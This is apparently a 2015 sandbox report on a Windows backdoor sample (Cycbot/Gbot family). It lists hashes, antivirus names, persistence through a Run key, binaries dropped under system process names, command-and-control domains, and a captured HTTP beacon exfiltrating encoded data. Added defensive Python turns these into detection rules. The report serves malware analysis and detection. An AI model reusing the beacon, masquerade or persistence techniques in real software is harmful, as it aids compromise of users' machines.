Analysis Date: 2015-01-17 13:55:40
MD5: 837e37064c3cdda422c45810a9b648e8
SHA1: 3a4a6b1bb25b7238bf461d7ab10eab0ece4161c8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 6197253569000ef2636a058b04f92a91 sha1: 9bd07cd81433eb4fd6432e4c6ce1ea9a95d6f994 size: 105984
Section .rdata  md5: a68ff4ef97fa171610bacfe645ed46ef sha1: 6345056c5528e4bd9802148e37b873787b4db7b2 size: 1024
Section .data   md5: d2d39712c202fbbc1cddb46b26287fa2 sha1: a4d81f547d43e24e8167ef6cb17180e0cab39456 size: 70144
Section .reloc  md5: 7d912832ef802578a3f4307d48f21806 sha1: ef8611956ed222a0de59479ac3097173fe616547 size: 1024
Timestamp: 2005-11-26 07:59:00 (PE header link time; attacker-controlled, so do not use it to date the sample)
PEhash: 3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhash: 06a9d0c73a32942ddb8292199f42057a
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Heur.Conjar.5
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-1367
AV Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.TFW
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen.2
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: japanesegreenteaonline.com
Winsock DNS: yourblogresources.com
Winsock DNS: coolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
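The runtime trace above is the part of this report worth turning into detections: the sample drops copies named dwm.exe, csrss.exe and conhost.exe into the user's Application Data and Temp directories (the genuine binaries live only under %SystemRoot%\System32), registers a Run value named conhost that points at one of them, and flips ProxyEnable to 1. The following Python is an added example and is not part of the sandbox report or of any tool the report uses. Its event dictionaries are transcribed from the paths listed above plus one constructed, legitimate C:\WINDOWS\system32\csrss.exe as a control; the rule names and the lists of system image names and user-writable directory fragments are my own assumptions.

```python
import ntpath

# Image names Windows only ever runs from %SystemRoot%\System32 (or the 32-bit
# copies in SysWOW64). The same name anywhere else is a masquerade.
SYSTEM_IMAGE_NAMES = {
    "csrss.exe", "dwm.exe", "conhost.exe", "smss.exe", "lsass.exe",
    "services.exe", "svchost.exe", "winlogon.exe", "wininit.exe",
}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Directory fragments an unprivileged user can write to: the XP/2003 profile
# layout seen in the report, and the Vista+ equivalents (my own list).
USER_WRITABLE_MARKERS = (
    "\\application data\\", "\\local settings\\temp\\",
    "\\appdata\\", "\\users\\", "\\temp\\",
)

# Events transcribed from the report's Runtime Details, plus one constructed
# legitimate csrss.exe (last entry) as a control that must not be flagged.
REPORT_EVENTS = [
    {"type": "process", "path": r"C:\malware.exe"},
    {"type": "process", "path": r"C:\Documents and Settings\Administrator\Application Data\dwm.exe"},
    {"type": "process", "path": r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"},
    {"type": "file", "path": r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"},
    {"type": "file", "path": r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC"},
    {"type": "registry",
     "key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost",
     "data": r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"},
    {"type": "registry",
     "key": r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable",
     "data": "1"},
    {"type": "process", "path": r"C:\WINDOWS\system32\csrss.exe"},  # constructed control
]


def is_user_writable(path):
    """True when the path sits under a directory an unprivileged user can write to."""
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def is_masquerading_system_image(path):
    """True for a System32-only image name located anywhere but System32/SysWOW64."""
    name = ntpath.basename(path).lower()
    directory = ntpath.dirname(path).lower().rstrip("\\")
    # Exact directory match on purpose: a prefix test would accept
    # C:\Windows\System32\subdir\csrss.exe or C:\Windows\System32evil\csrss.exe.
    return name in SYSTEM_IMAGE_NAMES and directory not in SYSTEM_DIRS


def triage(events):
    """Return one finding per matching event as {'rule': ..., 'evidence': ...}."""
    findings = []
    for ev in events:
        if ev["type"] in ("process", "file"):
            if is_masquerading_system_image(ev["path"]):
                findings.append({"rule": "system_name_outside_system32", "evidence": ev["path"]})
        elif ev["type"] == "registry":
            key, data = ev["key"].lower(), str(ev["data"])
            # Run, RunOnce and RunServices values that launch from a user-writable location.
            if "\\currentversion\\run" in key and is_user_writable(data):
                findings.append({"rule": "run_key_into_user_writable_dir",
                                 "evidence": ev["key"] + " -> " + data})
            # Proxy turned on for the browser; low severity alone, high with the above.
            if key.endswith("\\internet settings\\proxyenable") and data == "1":
                findings.append({"rule": "proxy_enabled", "evidence": ev["key"]})
    return findings


if __name__ == "__main__":
    for finding in triage(REPORT_EVENTS):
        print(finding["rule"].ljust(32), finding["evidence"])
```

Run against the report's events this yields five findings: three masquerading images (dwm.exe, csrss.exe and the dropped conhost.exe), the Run value, and the proxy change; the constructed System32 csrss.exe and the 75DE.FFC data file are not flagged. The directory comparison is an exact match rather than a prefix test so that a path such as C:\Windows\System32evil\csrss.exe is still caught.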

Network Details:

DNS: japanesegreenteaonline.com (Type: A) ➝ 66.117.0.221
DNS: onlinesearchdb.com (Type: A)
DNS: yourblogresources.com (Type: A)
DNS: coolmediastore.com (Type: A)
HTTP GET: http://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif?v21=5&tq=gJ4WK%2FSUh6zGkkR8oY%2BQrMWTUj26kJHjyZJSPbqVyaBqtUn5CGFYVw%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 66.117.0.221:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   322e6769 663f7632 313d3526 74713d67   2.gif?v21=5&tq=g
0x00000030 (00048)   4a34574b 25324653 5568367a 476b6b52   J4WK%2FSUh6zGkkR
0x00000040 (00064)   386f5925 32425172 4d575455 6a32366b   8oY%2BQrMWTUj26k
0x00000050 (00080)   4a486a79 5a4a5350 62715679 61427174   JHjyZJSPbqVyaBqt
0x00000060 (00096)   556e3543 47465956 77253344 25334420   Un5CGFYVw%3D%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a206a 6170616e 65736567 7265656e   t: japanesegreen
0x000000a0 (00160)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x000000b0 (00176)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000c0 (00192)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000d0 (00208)   322e300d 0a0d0a                       2.0....
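The capture shows the beacon: a GET for an apparent image with a percent-encoded base64 blob in the tq parameter, sent as HTTP/1.0 with the User-Agent "mozilla/2.0". The Python below is an added example, not part of the report or its tooling. It rebuilds the bytes from the hex dump exactly as printed above, parses the HTTP request, percent- and base64-decodes tq, and lists the request properties a network detection would key on. The page gives no key or format for the decoded bytes, so the example stops at measuring their length and entropy; the indicator heuristics are my own.

```python
import base64
import math
import re
from urllib.parse import parse_qs, urlsplit

# The "Raw Pcap" dump copied verbatim from the report.
RAW_PCAP_DUMP = """\
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   322e6769 663f7632 313d3526 74713d67   2.gif?v21=5&tq=g
0x00000030 (00048)   4a34574b 25324653 5568367a 476b6b52   J4WK%2FSUh6zGkkR
0x00000040 (00064)   386f5925 32425172 4d575455 6a32366b   8oY%2BQrMWTUj26k
0x00000050 (00080)   4a486a79 5a4a5350 62715679 61427174   JHjyZJSPbqVyaBqt
0x00000060 (00096)   556e3543 47465956 77253344 25334420   Un5CGFYVw%3D%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a206a 6170616e 65736567 7265656e   t: japanesegreen
0x000000a0 (00160)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x000000b0 (00176)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000c0 (00192)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000d0 (00208)   322e300d 0a0d0a                       2.0....
"""

_HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2,8}$")


def hexdump_to_bytes(dump):
    """Rebuild payload bytes from '0xOFFSET (DEC)  hex groups  ascii' lines.

    Only the hex groups are decoded; the ASCII column is ignored, and each line is
    capped at 16 bytes so ASCII text that happens to look like hex is never read as data.
    """
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        chunk = bytearray()
        for tok in tokens[2:]:
            if len(chunk) >= 16 or not _HEX_GROUP.match(tok) or len(tok) % 2:
                break
            chunk += bytes.fromhex(tok)
        out += chunk[:16]
    return bytes(out)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, target, version, headers); header names lower-cased."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for hdr in lines[1:]:
        name, _, value = hdr.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def shannon_entropy(data):
    """Bits per byte. 40 bytes of ciphertext sit near the log2(40) = 5.32 ceiling; text stays well below 4."""
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def analyse_beacon(dump=RAW_PCAP_DUMP):
    """Decode the request in the dump and return its fields plus my own heuristic indicators."""
    method, target, version, headers = parse_http_request(hexdump_to_bytes(dump))
    url = urlsplit(target)
    query = parse_qs(url.query)                      # parse_qs percent-decodes the values
    payload = base64.b64decode(query["tq"][0], validate=True)
    ua = headers.get("user-agent", "")
    indicators = []
    if "(" not in ua:
        indicators.append("User-Agent has no platform token: %r" % ua)
    if ua.startswith("mozilla/"):
        indicators.append("lower-case 'mozilla/' product token (browsers send 'Mozilla/')")
    if version == "HTTP/1.0":
        indicators.append("HTTP/1.0 request line; contemporary browsers speak HTTP/1.1")
    if url.path.lower().endswith((".gif", ".jpg", ".png")) and len(payload) > 16:
        indicators.append("%d bytes of base64 carried in the query of an image request" % len(payload))
    for hdr in ("accept-language", "accept-encoding"):
        if hdr not in headers:
            indicators.append("missing %s header" % hdr)
    return {
        "method": method, "version": version, "host": headers.get("host"),
        "path": url.path, "v21": query.get("v21", [None])[0], "user_agent": ua,
        "payload": payload, "payload_len": len(payload),
        "entropy": shannon_entropy(payload), "indicators": indicators,
    }


if __name__ == "__main__":
    r = analyse_beacon()
    print(r["method"], r["host"], r["path"], r["version"], r["user_agent"])
    print("tq -> %d bytes, entropy %.2f bits/byte: %s" % (r["payload_len"], r["entropy"], r["payload"].hex()))
    for indicator in r["indicators"]:
        print(" -", indicator)
```

The tq value decodes to 40 opaque bytes with an entropy near 5 bits per byte, which is what an encrypted or compressed check-in looks like, not an image cache-buster. The remaining fields (Host, lowercase User-Agent without a platform token, HTTP/1.0, no Accept-Language or Accept-Encoding) are the properties to put into a proxy or IDS signature alongside the domain itself.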


Strings
.
@.
....
a../
.F
@y@@
.

080904b0
1.0.0.1
1735
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
^^^^^}}}}}}}}}}}}}}
<<<<<<<<<<<<<<<<<
==~~~~~
======================
__________
---------
--------*****
,,,,,,,
::::::::::
???????
......
........
...........
"`@~<}
"""""""
"""""""""
((((((((((((((((((
]]::::::::::
}}}}}}
}}}}}}}}
}}}}}}}}}
@-$`@~
$$$$$$$$$
**************
&&&&&&&&&
#######
%%%%%%%%%%
+?	\+ 
++++++++
++++++++++++
			||||
			////////
									
0000000]]]]
^^^^^^^^^^^^000000000000000
000dddd
07K( @~
 0^d1V
"``0_h
0!pWB:
11_0iFF|`?
1m`^+0,
1r8L^}
,` 1ri
]2]6In
. `;27
2888888wwwwwww
?\!2pYYp
-2SNu$`
31Qqqnz
333WWW
3.a8mU
}3*jng
.3-[)m<
3Mp{+p
3~. `n=
}3n n@
4;]`3f
((((((444444444
4F?8oz
4i+D1(
[]4>K;A
5555>>>>>>
55555555&&&&#
5e"OLl
;5F)Cj
5._H5&
=5(KJo
5oN<1K
5}Sydd
5tzAqp_dz
5*yr"|
6     
613h+_
,@6_3T
66666666
666666666
66666SS008
^{6FVv
6iK'!v3<
6{vXES=
@@6w( @
71C#d4:?
:76~LV"
774K#3%
777777
8<b{m"
,8GFe3
8gHcPVZ
8 NS)!
@8`TM+
 `8TZv
999======
99999999999999999
:9Ao#61
{9jf%|
 `9Klt
9.>R9/
@A=0|-
A0g\:3q,
AAAAAA
aaaaaaaaaaaaaa
A"aZJ}R#
AcaeXO
Ahsa41
.;ANsO
as)>;S
/aW^v~
A/zonn
B0K?B)
ba8+n&
BBBBBBB
bbbbbbbbbbb
BBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
` b-G:
@"`@~b;mZ
^boG><
b\;RA:
Bt&PFWN
BuHZu|
;bY/IY
CCCCCCChhh
CEGl2N4
 cigBZ
ClipCursor
Co8, `
_%>c^p
CRcU/x
CreatePopupMenu
CrUUUUUU
c> `@w
Cz6]fq
@.data
DDDDDD
dddddddAAAAAA
DDDDDDDDyyyyy
DDDDDDttttttttQQQQQ
dd^^++++++++gggg
dd+|w2
DestroyMenu
]\D`j{
	@Dj|r
>D;"#O
.dOY{	U
d{QX!-)%
dTK=)5
+Du.`@
DuplicateHandle
Du &,y
DveM!( 
DwR"+taTL
!DyH|%
` e*  
E	0VRk
ea1w#c
__EEEEEE
eFe||+(
. `EI[
EnumResourceNamesW
eq_cKB
=Ez@'.
ffffff
`F[G  `
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
#f&` M
fU0h.j'
FW5,`@
,  Fx"
` FYOX
f(zU*F
;G1pdp
Gb?< `
g:EENa
GetDesktopWindow
GetModuleFileNameW
G -fdi
##GGG@@@@
gggggg
gJ-yZm
gl5?v`
GN1v	-
/GPHSp
GPPKrk
GQi4	'
g`r+n=
G{U`%B
GYHi)U
{GY$)q
H$@` `
H:D>2J
 HfTY9AQ
HFV, `
HGvuO?
Hn=:==
:hvGuN
Hz{[6n
"`@i4c
i	5\HU.\
`@I7v1
iCNc-e
IFeM1e
-IFT>JM
[[[[[II9
IIIIIIII
iiiiiiiii
IIIIIIIIIIIIIIII
IIIIIIIxxx
IIIwwwwww
IkT@szxo
:@IlA)
`@%i\NaSe
i]nCfZ
[Ix^2u
*` j0^
J=3Dz+^6h
j3	t>T
 @})J4J
?jC9cA
JJ"""""""
JJJJJJ
JJJJJJ:::::::
jjjjjjjjj________
!jL*y&[
jNUzvPID
JTu)5!k
----------K
k ;(1s
K(  4Wy?
KERNEL32.dll
kITOpn1rNf
KKKKKKK
kkkkkkkk
kkkt(((((
Kl)y~o
@K?Ml;
kppppppppll;
K}R<<}
?K;Z7I"
@ l$@ 
*` 	l/
l\b) @
Lddddddd
 `"  LE
ljMy'69=$
L<}k9f=B
lkXx4Sm
(((((((lllllll
`@L[nw
	LQ64d.
:L_Tkaj7iq
lv8My!H
@`+LVC
>\>m{%
!,M?\?
MapViewOfFile
`mG7<.
MIlb>|
+ml~ 0
mm_<kW
mmmmmmmm
MMMMMMMMMMMM
MMMMYYY8777777777777777
 mNG'_P;]
 n{#@;
NdrComplexArrayFree
'nG%vt
nkds<y7lU
;NkK$` A<
nnnnnnnn
nnnnnnnnn
NNNNNNNNN
nnnnnnnnnnn'
NNNNNNNNNNN
}}}}}}}}}nnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNNNNYYY@@@zz
nP>2kr
nRRRRRRR
nt.8qY
NX^x{!M
/o6[gc
oDt|.`
~ok8%S
OOOO__
OOOOOOOOOOOO
ooooooooooooo
OPU#-K
O<V,` 
?Ov>6O
*`@ozva
"` p& 
p:::::::
pa8[]X3
>\pDNr<zF
P!dWq.
p^e. `
p}F>^*
p-G_|	
/P;-ghl
=Ph$<8(?7
pjS]v_
@Po>Wj
|||||||PP
::::PPPPPP
PPPPPPPPP
PPPPPPPPPPP
PPPPPPPPPPPPPPP
+p=Vam
``p~yT
=^_\Q|
?  @Q49
q4IP}?
	Q^9]0n
Q@iog$
Q%N~&7
Qnlf;<
?_qOb	l*89
qqbbbbb
.q\Qf&:
,,,,,,QQQQQQQQ
]q^U\Z
qVp<Kx
r~~~~~
@ R2h+
@r2K@R={
|r8.H'y
`rb( @
RB}n  `
`.rdata
RedrawWindow
.reloc
~r{hso
 @~R!k 
RPCRT4.dll
r"`@RG=
rrr99999999999
rrrrrr
RRRRRRRRRRR))
RRRRVVVVVVVV
RS*@`{
 `rsL,
RtA[(`@|
@ R$` w9
rwETbj
rW	Y9|^
Sbbbbbbb
?Sd5yltO
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
@S![Mq6
sssssAAAA
/	S%vu
;s?Y|)
}s[Yy5NA
TD0x%a
!This program cannot be run in DOS mode.
timeEndPeriod
tnnnnnnn8888
TQ?iA]
TrackPopupMenuEx
TS[C(a
TT					
/&tUPW
%\U6	.
u"%eX_
`@U;fK
+uMAvU
UnmapViewOfFile
u-P4w0
USER32
/u~tQHfk
UuidCreate
UUUUUUUUUUUUUUUUUUUUU
uuuuuZJJJJJJJJJJJJJ
Ux^Ss<
ux)$zI
u[YyD]
/v5ErH
#V_6Ky
\V/f8?)
^VJMagG3
VJR-E>
vml"``
`/|vMlD&
Vtx'0)
 \W(_1
$wBO/7
 wHhh8
WINMM.dll
wl?tI/n8(
W@N_P!
W>NW& 
w`Q!T>
W(S~!^p>(c:
wwEEEO
wwwwwwwww
wwwwwwwwwwwwww
 wwwwwwwwwwwwwwww
@ X;0r 
Xf; @ U
]XG8C%
	\<Xl7
X))))mmmmmmmmmmmmmm
>XSxpFIp
<<XX+++
******XXXXXXXXgggggggg######
XXXXXXXXXX
 @Y2o4
`@Y3>o
``'Y8n
#Y9^`C.
@ `}yA
>yg3IU
y[Md)7Ut"
^;Y!n1x
y(qb;v
 `@Y*``T
yUUUUUUH
]Yx[5_F
yYGL~k
YYYYYYYYYYYYY
.yZ{Zz
]Z7OQ`
]Zbh79
z_eWE7
Zfiimo%
ZGf#T	1S
zjtYK*
<%Z'Mc
zYTtkUM